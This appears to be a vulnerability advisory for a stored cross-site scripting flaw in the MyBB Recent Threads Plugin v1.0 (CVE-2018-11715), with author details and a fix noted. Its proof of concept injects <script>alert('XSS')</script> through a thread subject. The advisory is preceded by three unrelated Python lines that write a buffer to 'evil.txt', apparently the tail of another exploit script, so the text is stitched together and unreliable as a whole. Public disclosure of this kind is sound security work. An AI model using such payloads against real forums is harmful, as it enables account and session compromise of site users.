f=open("evil.txt","w")
f.write(buf)
f.close()
# Exploit Title: MyBB Recent Threads Plugin v1.0 - Cross-Site Scripting
# Date: 6/2/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=842
# Version: 1.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11715
1. Description:
Creates a page that shows threads that the user has posted in when they have unread replies.
2. Proof of Concept:
- Create or reply to a thread with the following subject <script>alert('XSS')</script>
- When someone replies to the thread you will see the alert here /misc.php?action=myrecentthreads
3. Solution:
Update to 1.1